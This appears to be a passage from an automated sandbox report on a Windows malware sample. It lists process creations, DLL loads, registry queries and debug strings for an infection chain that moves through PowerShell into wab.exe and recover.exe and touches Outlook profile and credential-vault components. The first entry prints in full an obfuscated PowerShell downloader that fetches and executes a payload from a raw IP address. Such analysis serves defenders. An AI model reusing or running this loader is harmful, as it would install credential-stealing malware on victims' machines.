Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Caked124 = 1;$Allegroernes15='S';$Allegroernes15+='ubstrin';$Allegroernes15+='g';Function unkaiserlike($Micrometeoroid){$Specialuddannelser=$Micrometeoroid.Length-$Caked124;For($Presaged=1; $Presaged -lt $Specialuddannelser; $Presaged+=(2)){$Vedic+=$Micrometeoroid.$Allegroernes15.Invoke($Presaged, $Caked124);}$Vedic;}function Hydrolyzable($Superheater){. ($Porsitets) ($Superheater);}$Alcoholmeter=unkaiserlike ',M oLzgiflDl,a,/ 5 . 0v F(,W,iKnUd o.wKsS FNSTB ,1.0,.T0,;S QWFiSna6c4 ;C Fx 6H4V; Sr.v :.1 2 1K.B0A), BGpe,cRk.oT/ 2h0 1,0 0N1 0A1D UF i r,eUfVo.x./H1 2,1S.A0, ';$Nonattribution175=unkaiserlike '.U sMe r -pA gDe.nDtb ';$Leggiest89=unkaiserlike 'Hh t t p :T/,/.8S7C.C1S2,1,. 1k0S5T.,1 6P3 / d,o m ksaPpkiBt,l e rb.fmIs iA ';$Heitiki=unkaiserlike 'T>S ';$Porsitets=unkaiserlike ' iUeLx ';$Mediaevalism='Garapato';Hydrolyzable (unkaiserlike 'RSCe,tS- CYoCnEt.e,n.t, C- P aAt.hS TP:J\ JUo.rbdMk l o,dAe,r . t.xNtC A-,V,aLl.u.eE .$,M e.dAiTa eBvSaJl.iHsNmU; ');Hydrolyzable (unkaiserlike ' i f ( t e sFt -Ap,a.t h, RTG:E\ J oNr d,k lBoFdFeDrO.,tPx.tL)F{ eGxSi t }.; ');$landingsprocedurernes = unkaiserlike ',e.cDh.o. N%,a p.p,d aotFa.% \ T hLeWrSmMoRsGwdiSt c.hM1B7 2I. MIe d, T&P&E Be.cUhFoF ,$. ';Hydrolyzable (unkaiserlike '.$.gQlCoPbpaClB:,ALl gRu mm=A( cHm dH / c $Ml,aanRdPiAn g s.p.r.oTc,eOdMuAr,eKr n,ets ) ');Hydrolyzable (unkaiserlike ' $ g lSo b a lU:LD.a t,aTmAaGsSk i n e rInNe,=N$ LSeAg,g i e,sDtf8O9E. s,pDlSi t (.$,H e iCtAi kSi,). ');$Leggiest89=$Datamaskinerne[0];Hydrolyzable (unkaiserlike ' $Gg l o b a,lK:.RJi p pHlAeSrMs.=CN e,w,-,ORb.j e cftB SDyAsmtPe mS.SN e tK.BWNe,bGC lSi eKnBtF ');Hydrolyzable (unkaiserlike 'U$IR iJp p l e rCsL.RH.e,aRd,e r sF[.$BNsoVnMabt t,rIi bAuDt iDo nF1S7d5 ]P=S$EAVl,c.o.hRo lHmSe,tHe r ');$Entertaineres=unkaiserlike 'SR iHpApWl e,rvs . DSoRwWn,l.oSa,dIFsiVl eS(a$ L e g,gCiBeSs tC8 9P,E$NL u,fKtOn iRn,gDeDr,s 1 8 5,)S ';$Entertaineres=$Algum[1]+$Entertaineres;$Luftningers185=$Algum[0];Hydrolyzable (unkaiserlike ',$ g,l.o,b,aGl :,P rLo,p a gAe r,e.nRd e =G(.TUeCs tN-,P a,t h $ LPuCfktDnSi,nGg eFr sF1T8I5L) ');while (!$Propagerende) {Hydrolyzable (unkaiserlike ' $Sgcl oDbSaFlS:.V iud.e lCyHsRtBe nQ=C$Ft,r uPei ') ;Hydrolyzable $Entertaineres;Hydrolyzable (unkaiserlike ' S.t a r tU-,Stl.eLe.pH S4 ');Hydrolyzable (unkaiserlike ',$ g lEo b.a lE:OP,rNoPp,aSgTe r.e n dEe,= (PT,e sRtF-.POa tPhV B$FL u,fTtbn i n,g eGrUsB1O8.5 )R ') ;Hydrolyzable (unkaiserlike ' $MgAl oVb aSlK: D.e.cNaTnSaUlJ=M$BgNl,oIbEaAl,:FA.lFgNoSr.iTsTtTiKcC+ +R% $ DYaSt aSmNa.sPk ivnNe rOnFe .,c,oTu.n tP ') ;$Leggiest89=$Datamaskinerne[$Decanal];}Hydrolyzable (unkaiserlike ' $Tg.lPo bsaClS:STBr aUn sFpSaSt rUoCn.iTzpe d, A=. ,GAeKt - C,oAn,t eDn tP T$TLAuNfTtFn iAn g eAr s 1J8S5 ');Hydrolyzable (unkaiserlike 'P$.gAlPoTb aOlB:FU n.laa i,df =S M[.S,yLsBt.eAm ..CUo n vRe.r.t.],: : F rBo m BGa sCe,6c4,SSt r.itnTgP(D Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Thermoswitch172.Med && echo $" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe Process created: C:\Windows\SysWOW64\recover.exe "C:\Windows\SysWOW64\recover.exe" Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe Section loaded: ulib.dll Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe Section loaded: ifsutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe Section loaded: devobj.dll Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe Section loaded: winsqlite3.dll Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptdlg.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msoert2.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptui.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msftedit.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: actxprxy.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptdlg.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msoert2.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptui.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msftedit.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{06290BD0-48AA-11D2-8432-006008C3FBFC}\InprocServer32 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Windows\SysWOW64\msftedit.dll Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: Binary string: ws\System.Core.pdbAP source: powershell.exe, 00000005.00000002.2455355993.0000000008130000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: recover.pdb source: wab.exe, 0000000A.00000003.2572034726.0000000004355000.00000004.00000020.00020000.00000000.sdmp, qdSMStVpAfAXHdDEbm.exe, 0000000C.00000002.3358338282.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2451195111.0000000007138000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000005.00000002.2451195111.0000000007138000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: qdSMStVpAfAXHdDEbm.exe, 0000000C.00000002.3357478857.000000000019E000.00000002.00000001.01000000.00000007.sdmp, qdSMStVpAfAXHdDEbm.exe, 0000000E.00000002.3357480390.000000000019E000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: wntdll.pdbUGP source: wab.exe, 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2494599943.000000001FBC1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2489818539.000000001FA12000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 0000000D.00000002.3358868030.0000000003440000.00000040.00001000.00020000.00000000.sdmp, recover.exe, 0000000D.00000002.3358868030.00000000035DE000.00000040.00001000.00020000.00000000.sdmp, recover.exe, 0000000D.00000003.2618102098.00000000030D7000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 0000000D.00000003.2620352047.000000000328B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdbR*\ source: powershell.exe, 00000005.00000002.2455567320.00000000081B0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.2448417031.0000000002DB9000.00000004.00000020.00020000.00000000.sdmp
